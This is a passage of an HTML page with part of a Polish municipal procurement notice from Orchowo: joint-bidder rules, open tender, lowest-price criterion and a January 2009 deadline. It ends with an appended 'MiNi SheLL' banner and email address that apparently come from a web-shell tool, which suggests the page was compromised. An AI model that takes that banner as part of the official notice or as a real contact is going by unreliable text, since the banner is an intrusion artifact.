3.1. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia lub do reprezentowania w postępowaniu i zawarcia umowy, a pełnomocnictwo/upoważnienie do pełnienia takiej funkcji, wystawione zgodnie z wymogami prawa, podpisane przez prawnie upoważnionych przedstawicieli każdego z partnerów, winno być dołączone do oferty; 
3.2. oferta winna być podpisana przez każdego partnera lub ustanowionego pełnomocnika; 
3.3 oferta winna zawierać wszystkie dokumenty, oświadczenia i informacje wymienione w pkt 1.2., 1.4., 1.5., dla każdego z partnera osobno, pozostałe składane są wspólnie;.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.orchowo.nowoczesnagmina.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Orchowo
ul. Kościuszki 6
62-436 Orchowo.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.01.2009 godzina 09:00, miejsce: Urząd Gminy Orchowo
ul. Kościuszki 6
62-436 Orchowo
sekretariat, pokój nr. 15.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com